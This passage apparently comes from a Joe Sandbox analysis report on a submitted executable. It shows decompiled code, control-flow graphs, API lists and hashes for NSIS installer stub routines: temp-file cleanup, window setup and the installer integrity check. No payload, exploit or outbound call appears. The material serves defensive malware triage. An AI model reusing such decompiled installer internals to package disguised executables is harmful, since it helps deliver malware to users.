              0x0040580f
              0x00405812
              0x00405814
              0x00000000
              0x00000000
              0x00405816
              0x00405818
              0x00000000
              0x00000000
              0x0040581a
              0x0040581e
              0x00000000
              0x00000000
              0x00000000
              0x00405879
              0x00405883
              0x00405889
              0x00405889
              0x00405894
              0x00000000
              0x00405894
              0x004057b0
              0x004057b7
              0x00000000
              0x00000000
              0x00000000
              0x00405775
              0x00405775
              0x00405777
              0x004058a4
              0x004058a6
              0x004058a9
              0x004058fa
              0x004058fa
              0x004058fa
              0x004058ab
              0x004058ae
              0x004058b9
              0x004058be
              0x004058c0
              0x00000000
              0x00000000
              0x004058c3
              0x004058cf
              0x004058d4
              0x004058d6
              0x00000000
              0x004058f1
              0x004058d8
              0x004058db
              0x00000000
              0x00000000
              0x004058e0
              0x00000000
              0x004058e7
              0x004058b0
              0x004058b0
              0x00000000
              0x004058b0
              0x0040577d
              0x00405780
              0x00000000
              0x00000000
              0x00000000
              0x00405780

              APIs
              • DeleteFileA.KERNELBASE(?,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405756
              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nst356E.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nst356E.tmp\*.*,?,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040579E
              • lstrcatA.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nst356E.tmp\*.*,?,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057BF
              • lstrlenA.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nst356E.tmp\*.*,?,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057C5
              • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nst356E.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nst356E.tmp\*.*,?,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057D6
              • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405883
              • FindClose.KERNEL32(00000000), ref: 00405894
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
              • String ID: "C:\Users\user\Desktop\P196hUN2fw.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nst356E.tmp\*.*$\*.*
              • API String ID: 2035342205-3810270440
              • Opcode ID: 5a75186390c9518ef53bc7868eb0b51ef72d35058a64af47be824dbaeb8436d1
              • Instruction ID: 2a0351abb2716448ee460da7bfccfa5d3c7c3698b554042fcfc8e424752a7a40
              • Opcode Fuzzy Hash: 5a75186390c9518ef53bc7868eb0b51ef72d35058a64af47be824dbaeb8436d1
              • Instruction Fuzzy Hash: 2551B132900A04AAEF217B268C45FBF7A78DF42754F14817BF841B61D1D73C8952DEA9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 583 406268-40627c FindFirstFileA 584 406289 583->584 585 40627e-406287 FindClose 583->585 586 40628b-40628c 584->586 585->586
              C-Code - Quality: 100%
              			E00406268(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0c0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0c0;
			}




              0x00406273
              0x0040627c
              0x00000000
              0x00406289
              0x0040627f
              0x00000000

              APIs
              • FindFirstFileA.KERNELBASE(766DFA90,0042C0C0,C:\,00405A2E,C:\,C:\,00000000,C:\,C:\,766DFA90,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,766DFA90,C:\Users\user\AppData\Local\Temp\), ref: 00406273
              • FindClose.KERNEL32(00000000), ref: 0040627F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: Find$CloseFileFirst
              • String ID: C:\
              • API String ID: 2295610775-3404278061
              • Opcode ID: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
              • Instruction ID: e0279db6a2f9a876ecb4b02bc738002a428a13ad585e0dc9357aaf1afb57e826
              • Opcode Fuzzy Hash: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
              • Instruction Fuzzy Hash: 9DD012365060209FC25027786D0C85B7A589F053317118B7FF8AAF21E0C7348CA386DC
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004037B5 Relevance: 44.0, APIs: 14, Strings: 11, Instructions: 215stringregistryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 132 4037b5-4037cd call 4062fd 135 4037e1-403812 call 405e4c 132->135 136 4037cf-4037da GetUserDefaultUILanguage call 405ec3 132->136 142 403814-403825 call 405e4c 135->142 143 40382a-403830 lstrcatA 135->143 139 4037df 136->139 141 403835-40385e call 403a7a call 4059eb 139->141 149 403864-403869 141->149 150 4038e5-4038ed call 4059eb 141->150 142->143 143->141 149->150 151 40386b-40388f call 405e4c 149->151 156 4038fb-403920 LoadImageA 150->156 157 4038ef-4038f6 call 405f87 150->157 151->150 158 403891-403893 151->158 160 4039a1-4039a9 call 40140b 156->160 161 403922-403952 RegisterClassA 156->161 157->156 162 4038a4-4038b0 lstrlenA 158->162 163 403895-4038a2 call 405928 158->163 175 4039b3-4039be call 403a7a 160->175 176 4039ab-4039ae 160->176 164 403a70 161->164 165 403958-40399c SystemParametersInfoA CreateWindowExA 161->165 169 4038b2-4038c0 lstrcmpiA 162->169 170 4038d8-4038e0 call 4058fd call 405f65 162->170 163->162 168 403a72-403a79 164->168 165->160 169->170 174 4038c2-4038cc GetFileAttributesA 169->174 170->150 179 4038d2-4038d3 call 405944 174->179 180 4038ce-4038d0 174->180 184 4039c4-4039de ShowWindow call 40628f 175->184 185 403a47-403a4f call 40515e 175->185 176->168 179->170 180->170 180->179 192 4039e0-4039e5 call 40628f 184->192 193 4039ea-4039fc GetClassInfoA 184->193 190 403a51-403a57 185->190 191 403a69-403a6b call 40140b 185->191 190->176 194 403a5d-403a64 call 40140b 190->194 191->164 192->193 197 403a14-403a45 DialogBoxParamA call 40140b call 403705 193->197 198 4039fe-403a0e GetClassInfoA RegisterClassA 193->198 194->176 197->168 198->197
              C-Code - Quality: 96%
              			E004037B5(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f414;
				_t17 = E004062FD(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a870;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00405E4C(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a870, 0);
					__eflags =  *0x42a870;
					if(__eflags == 0) {
						E00405E4C(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040835A, 0x42a870, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00405EC3("1033", _t67 & 0x0000ffff);
				}
				E00403A7A(_t71, _t84);
				 *0x42f4a0 =  *0x42f41c & 0x00000020;
				 *0x42f4bc = 0x10000;
				if(E004059EB(_t84, 0x435400) != 0) {
					L16:
					if(E004059EB(_t92, 0x435400) == 0) {
						E00405F87(0, _t74, _t76, 0x435400,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f400, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42ebe8 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403A7A(_t71, __eflags);
							__eflags =  *0x42f4c0;
							if( *0x42f4c0 != 0) {
								_t28 = E0040515E(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ebcc; // 0x1
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a850, 5);
							_t34 = E0040628F("RichEd20");
							__eflags = _t34;
							if(_t34 == 0) {
								E0040628F("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42eba0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42eba0);
								 *0x42ebc4 = _t81;
								RegisterClassA(0x42eba0);
							}
							_t36 =  *0x42ebe0; // 0x0
							_t39 = DialogBoxParamA( *0x42f400, _t36 + 0x00000069 & 0x0000ffff, 0, E00403B52, 0);
							E00403705(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f400;
						 *0x42eba4 = E00401000;
						 *0x42ebb0 =  *0x42f400;
						 *0x42ebb4 = _t25;
						 *0x42ebc4 = 0x40a1f4;
						if(RegisterClassA(0x42eba0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a850 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f400, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3a0;
					E00405E4C(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f458, 0x42e3a0, 0);
					_t57 =  *0x42e3a0; // 0x31
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3a1;
						 *((char*)(E00405928(0x42e3a1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00405F65(0x435400, E004058FD(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405944(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}


























              0x004037bb
              0x004037c4
              0x004037cb
              0x004037cd
              0x004037e1
              0x004037f3
              0x004037fa
              0x00403801
              0x00403807
              0x0040380c
              0x00403812
              0x00403825
              0x00403825
              0x00403830
              0x004037cf
              0x004037cf
              0x004037da
              0x004037da
              0x00403835
              0x00403848
              0x0040384d
              0x0040385e
              0x004038e5
              0x004038ed
              0x004038f6
              0x004038f6
              0x0040390c
              0x00403912
              0x00403920
              0x004039a1
              0x004039a9
              0x004039b3
              0x004039b8
              0x004039be
              0x00403a48
              0x00403a4d
              0x00403a4f
              0x00403a6b
              0x00000000
              0x00403a6b
              0x00403a51
              0x00403a57
              0x00403a5f
              0x00403a5f
              0x00000000
              0x00403a57
              0x004039cc
              0x004039d7
              0x004039dc
              0x004039de
              0x004039e5
              0x004039e5
              0x004039f0
              0x004039f8
              0x004039fa
              0x004039fc
              0x00403a05
              0x00403a08
              0x00403a0e
              0x00403a0e
              0x00403a14
              0x00403a2d
              0x00403a3e
              0x00000000
              0x00403a43
              0x004039ab
              0x004039ad
              0x00000000
              0x00403922
              0x00403922
              0x0040392e
              0x00403938
              0x0040393e
              0x00403943
              0x00403952
              0x00403a70
              0x00403a70
              0x00000000
              0x00403a70
              0x00403961
              0x0040399c
              0x00000000
              0x0040399c
              0x00403864
              0x00403864
              0x00403867
              0x00403869
              0x00000000
              0x00000000
              0x00403873
              0x00403883
              0x00403888
              0x0040388f
              0x00000000
              0x00000000
              0x00403893
              0x00403895
              0x004038a2
              0x004038a2
              0x004038aa
              0x004038b0
              0x004038d8
              0x004038e0
              0x00000000
              0x004038c2
              0x004038c3
              0x004038cc
              0x004038d2
              0x004038d3
              0x00000000
              0x004038d3
              0x004038ce
              0x004038d0
              0x00000000
              0x00000000
              0x00000000
              0x004038d0
              0x004038b0

              APIs
                • Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
                • Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
              • GetUserDefaultUILanguage.KERNELBASE(00000002,766DFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\P196hUN2fw.exe",00000000), ref: 004037CF
                • Part of subcall function 00405EC3: wsprintfA.USER32 ref: 00405ED0
              • lstrcatA.KERNEL32(1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,766DFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\P196hUN2fw.exe",00000000), ref: 00403830
              • lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,766DFA90), ref: 004038A5
              • lstrcmpiA.KERNEL32(?,.exe,0042E3A0,?,?,?,0042E3A0,00000000,00435400,1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000), ref: 004038B8
              • GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038C3
              • LoadImageA.USER32 ref: 0040390C
              • RegisterClassA.USER32 ref: 00403949
              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403961
              • CreateWindowExA.USER32 ref: 00403996
              • ShowWindow.USER32(00000005,00000000), ref: 004039CC
              • GetClassInfoA.USER32 ref: 004039F8
              • GetClassInfoA.USER32 ref: 00403A05
              • RegisterClassA.USER32 ref: 00403A0E
              • DialogBoxParamA.USER32 ref: 00403A2D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
              • String ID: "C:\Users\user\Desktop\P196hUN2fw.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
              • API String ID: 606308-3844091268
              • Opcode ID: 7c46e95d15e6a007461aada79675e14bbdf31a6050e9bfd56e3caf825b44128a
              • Instruction ID: cf57693f3f88dc886a5042f17341946b18930627488d4c28d640959b633c26bb
              • Opcode Fuzzy Hash: 7c46e95d15e6a007461aada79675e14bbdf31a6050e9bfd56e3caf825b44128a
              • Instruction Fuzzy Hash: 3E61D770240600AED620BB669D45F373EACEB44749F40447EF985B22E2DB7C9D029A2D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402D48 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 205 402d48-402d96 GetTickCount GetModuleFileNameA call 405afe 208 402da2-402dd0 call 405f65 call 405944 call 405f65 GetFileSize 205->208 209 402d98-402d9d 205->209 217 402dd6 208->217 218 402ebd-402ecb call 402ce4 208->218 210 402f7a-402f7e 209->210 219 402ddb-402df2 217->219 225 402f20-402f25 218->225 226 402ecd-402ed0 218->226 221 402df4 219->221 222 402df6-402dff call 403193 219->222 221->222 231 402e05-402e0c 222->231 232 402f27-402f2f call 402ce4 222->232 225->210 227 402ed2-402eea call 4031a9 call 403193 226->227 228 402ef4-402f1e GlobalAlloc call 4031a9 call 402f81 226->228 227->225 251 402eec-402ef2 227->251 228->225 256 402f31-402f42 228->256 235 402e88-402e8c 231->235 236 402e0e-402e22 call 405ab9 231->236 232->225 240 402e96-402e9c 235->240 241 402e8e-402e95 call 402ce4 235->241 236->240 254 402e24-402e2b 236->254 247 402eab-402eb5 240->247 248 402e9e-402ea8 call 4063b4 240->248 241->240 247->219 255 402ebb 247->255 248->247 251->225 251->228 254->240 260 402e2d-402e34 254->260 255->218 257 402f44 256->257 258 402f4a-402f4f 256->258 257->258 261 402f50-402f56 258->261 260->240 262 402e36-402e3d 260->262 261->261 263 402f58-402f73 SetFilePointer call 405ab9 261->263 262->240 264 402e3f-402e46 262->264 267 402f78 263->267 264->240 266 402e48-402e68 264->266 266->225 268 402e6e-402e72 266->268 267->210 269 402e74-402e78 268->269 270 402e7a-402e82 268->270 269->255 269->270 270->240 271 402e84-402e86 270->271 271->240
              C-Code - Quality: 80%
              			E00402D48(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\alfons\\Desktop\\P196hUN2fw.exe";
				 *0x42f410 = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\P196hUN2fw.exe", 0x400);
				_t89 = E00405AFE(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\alfons\\Desktop";
				E00405F65("C:\\Users\\alfons\\Desktop", _t91);
				E00405F65(0x437000, E00405944(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x42142c = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402CE4(1);
					__eflags =  *0x42f418 - _t82;
					if( *0x42f418 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E004031A9( *0x42f418 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402F81(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42f414 = _t94;
							 *0x42f41c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42f420 =  *0x42f420 + 1;
								__eflags =  *0x42f420;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405AB9(0x42f440, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004031A9( *0x415420);
					_t65 = E00403193( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42f418) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403193(0x421430, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402CE4(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42f418;
						if( *0x42f418 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402CE4(0);
							}
							goto L20;
						}
						E00405AB9( &_v44, 0x421430, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x415420; // 0x36e190
						 *0x42f4c0 =  *0x42f4c0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42f418 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a194
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x42142c; // 0x36e194
						if(__eflags < 0) {
							_v12 = E004063B4(_v12, 0x421430, _t90);
						}
						 *0x415420 =  *0x415420 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}































              0x00402d50
              0x00402d53
              0x00402d56
              0x00402d59
              0x00402d5f
              0x00402d70
              0x00402d75
              0x00402d88
              0x00402d8d
              0x00402d90
              0x00402d96
              0x00000000
              0x00402d98
              0x00402da3
              0x00402da9
              0x00402dba
              0x00402dc1
              0x00402dc7
              0x00402dc9
              0x00402dce
              0x00402dd0
              0x00402ebd
              0x00402ebf
              0x00402ec4
              0x00402ecb
              0x00000000
              0x00000000
              0x00402ecd
              0x00402ed0
              0x00402ef4
              0x00402ef9
              0x00402eff
              0x00402f0a
              0x00402f0f
              0x00402f12
              0x00402f13
              0x00402f14
              0x00402f16
              0x00402f1b
              0x00402f1e
              0x00402f31
              0x00402f35
              0x00402f3d
              0x00402f42
              0x00402f44
              0x00402f44
              0x00402f44
              0x00402f4c
              0x00402f4c
              0x00402f4f
              0x00402f50
              0x00402f50
              0x00402f53
              0x00402f55
              0x00402f55
              0x00402f55
              0x00402f5f
              0x00402f65
              0x00402f73
              0x00402f78
              0x00000000
              0x00402f78
              0x00000000
              0x00402f1e
              0x00402ed8
              0x00402ee3
              0x00402ee8
              0x00402eea
              0x00000000
              0x00000000
              0x00402eef
              0x00402ef2
              0x00000000
              0x00000000
              0x00000000
              0x00402dd6
              0x00402ddb
              0x00402de0
              0x00402de4
              0x00402deb
              0x00402df0
              0x00402df2
              0x00402df4
              0x00402df4
              0x00402df8
              0x00402dfd
              0x00402dff
              0x00402f29
              0x00402f20
              0x00000000
              0x00402f20
              0x00402e05
              0x00402e0c
              0x00402e88
              0x00402e8c
              0x00402e90
              0x00402e95
              0x00000000
              0x00402e8c
              0x00402e15
              0x00402e1a
              0x00402e1d
              0x00402e22
              0x00000000
              0x00000000
              0x00402e24
              0x00402e2b
              0x00000000
              0x00000000
              0x00402e2d
              0x00402e34
              0x00000000
              0x00000000
              0x00402e36
              0x00402e3d
              0x00000000
              0x00000000
              0x00402e3f
              0x00402e46
              0x00000000
              0x00000000
              0x00402e48
              0x00402e4e
              0x00402e57
              0x00402e5d
              0x00402e60
              0x00402e62
              0x00402e68
              0x00000000
              0x00000000
              0x00402e6e
              0x00402e72
              0x00402e7a
              0x00402e7a
              0x00402e7d
              0x00402e7d
              0x00402e80
              0x00402e82
              0x00402e84
              0x00402e84
              0x00000000
              0x00402e82
              0x00402e74
              0x00402e78
              0x00000000
              0x00000000
              0x00000000
              0x00402e96
              0x00402e96
              0x00402e9c
              0x00402ea8
              0x00402ea8
              0x00402eab
              0x00402eb1
              0x00402eb3
              0x00402eb3
              0x00402ebb
              0x00402ebb
              0x00000000
              0x00402ebb

              APIs
              • GetTickCount.KERNEL32 ref: 00402D59
              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\P196hUN2fw.exe,00000400), ref: 00402D75
                • Part of subcall function 00405AFE: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\P196hUN2fw.exe,80000000,00000003), ref: 00405B02
                • Part of subcall function 00405AFE: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
              • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\P196hUN2fw.exe,C:\Users\user\Desktop\P196hUN2fw.exe,80000000,00000003), ref: 00402DC1
              Strings
              • soft, xrefs: 00402E36
              • Inst, xrefs: 00402E2D
              • "C:\Users\user\Desktop\P196hUN2fw.exe", xrefs: 00402D48
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D4F
              • C:\Users\user\Desktop, xrefs: 00402DA3, 00402DA8, 00402DAE
              • Error launching installer, xrefs: 00402D98
              • Null, xrefs: 00402E3F
              • C:\Users\user\Desktop\P196hUN2fw.exe, xrefs: 00402D5F, 00402D6E, 00402D82, 00402DA2
              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F20
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
